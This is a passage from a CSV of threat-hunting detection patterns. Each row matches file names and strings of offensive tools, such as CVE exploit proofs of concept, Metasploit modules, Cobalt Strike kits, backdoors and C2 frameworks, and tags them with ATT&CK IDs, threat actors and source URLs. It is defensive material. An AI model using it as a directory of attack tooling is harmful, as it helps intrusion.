tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39252" "*CVE-*.vbscript*",".{0,1000}CVE\-.{0,1000}\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39253" "*CVE-*.zsh*",".{0,1000}CVE\-.{0,1000}\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39254" "*CVE*/exploit.sh*",".{0,1000}CVE.{0,1000}\/exploit\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","39255" "*CVE_*_exploited.txt*",".{0,1000}CVE_.{0,1000}_exploited\.txt.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","N/A","1","44","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z","39256" "*cve_2_MSF_exploit_Mapping*",".{0,1000}cve_2_MSF_exploit_Mapping.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","39257" "*CVE_20*.dll*",".{0,1000}CVE_20.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","39258" 
"*cve_2019_0708_bluekeep_fail*",".{0,1000}cve_2019_0708_bluekeep_fail.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39259" "*cve_2019_0708_bluekeep_pass*",".{0,1000}cve_2019_0708_bluekeep_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39260" "*cve_2020_0796_smbghost.*",".{0,1000}cve_2020_0796_smbghost\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39261" "*CVE-2*-RCE.py*",".{0,1000}CVE\-2.{0,1000}\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39262" "*cve-20.x64.dll*",".{0,1000}cve\-20\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","39263" "*cve-20.x86.dll*",".{0,1000}cve\-20\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","39264" "*cve-2020-1472-exploit.py*",".{0,1000}cve\-2020\-1472\-exploit\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39265" "*CVE-2020-5902-Scanner/scanner.py*",".{0,1000}CVE\-2020\-5902\-Scanner\/scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z","39266" "*CVE-2021-1675.ps1*",".{0,1000}CVE\-2021\-1675\.ps1.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","1","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","39267" "*CVE-2021-1675.py*",".{0,1000}CVE\-2021\-1675\.py.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","39268" 
"*CVE-2021-27090-Secure-Kernel-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2021\-27090\-Secure\-Kernel\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39269" "*CVE-2021-34527.ps1*",".{0,1000}CVE\-2021\-34527\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39270" "*cve-20220-26809_exploit.py*",".{0,1000}cve\-20220\-26809_exploit\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","39271" 
"*CVE-2022-0847-DirtyPipe-Exploits.*",".{0,1000}CVE\-2022\-0847\-DirtyPipe\-Exploits\..{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","39272" "*CVE-2022-21882.x64.dll*",".{0,1000}CVE\-2022\-21882\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39273" "*cve-2022-23131.py *",".{0,1000}cve\-2022\-23131\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","N/A","1","29","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z","39274" "*cve-2022-26809-scanVuln.py*",".{0,1000}cve\-2022\-26809\-scanVuln\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","39275" "*CVE-2022-30190-follina-Office-MSDT-Fixed*",".{0,1000}CVE\-2022\-30190\-follina\-Office\-MSDT\-Fixed.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","39276" "*CVE-2022-34709-Credential-Guard-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2022\-34709\-Credential\-Guard\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39277" "*CVE-2023-20887.git*",".{0,1000}CVE\-2023\-20887\.git.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","39278" "*cve-2023-21554.nse*",".{0,1000}cve\-2023\-21554\.nse.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","39279" "*CVE-2023-21768-AFD-Driver-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2023\-21768\-AFD\-Driver\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39280" "*CVE-2023-23397.ps1*",".{0,1000}CVE\-2023\-23397\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","39281" "*CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ*",".{0,1000}CVE\-2023\-46604\-RCE\-Reverse\-Shell\-Apache\-ActiveMQ.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","39282" "*CVE-2024-1086/exploit*",".{0,1000}CVE\-2024\-1086\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39283" "*CVE-2024-1086-1.0.0.zip*",".{0,1000}CVE\-2024\-1086\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39284" 
"*CVE-2024-22274-RCE.py*",".{0,1000}CVE\-2024\-22274\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","39285" "*CVE-2024-49138-POC.exe*",".{0,1000}CVE\-2024\-49138\-POC\.exe.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","1","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","39286" "*CVE-2024-49138-POC.rc*",".{0,1000}CVE\-2024\-49138\-POC\.rc.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","39287" "*cvescanner.py*",".{0,1000}cvescanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","39288" "*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*",".{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 
","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","39289" "*cyberark/ACLight*",".{0,1000}cyberark\/ACLight.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","39291" "*cyberark/kubesploit*",".{0,1000}cyberark\/kubesploit.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","39292" "*cyberark/PipeViewer*",".{0,1000}cyberark\/PipeViewer.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","39293" "*cyberarkrules@gmail.com*",".{0,1000}cyberarkrules\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39294" "*cybersectroll/SharpPersistSD*",".{0,1000}cybersectroll\/SharpPersistSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote 
machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","39316" "*cyclone.hashesorg.hashkiller.combined*",".{0,1000}cyclone\.hashesorg\.hashkiller\.combined.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","39317" "*CykuTW/tsh-go*",".{0,1000}CykuTW\/tsh\-go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","39318" "*cylance/SMBTrap*",".{0,1000}cylance\/SMBTrap.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","39319" "*cyllective/nimproxydll*",".{0,1000}cyllective\/nimproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","39320" "*cypheroth -u neo4j -p 
*",".{0,1000}cypheroth\s\-u\sneo4j\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39321" "*-d * bruteforce -*",".{0,1000}\-d\s.{0,1000}\sbruteforce\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","39326" "*-d kali-linux *",".{0,1000}\-d\skali\-linux\s.{0,1000}","offensive_tool_keyword","kali","Kali 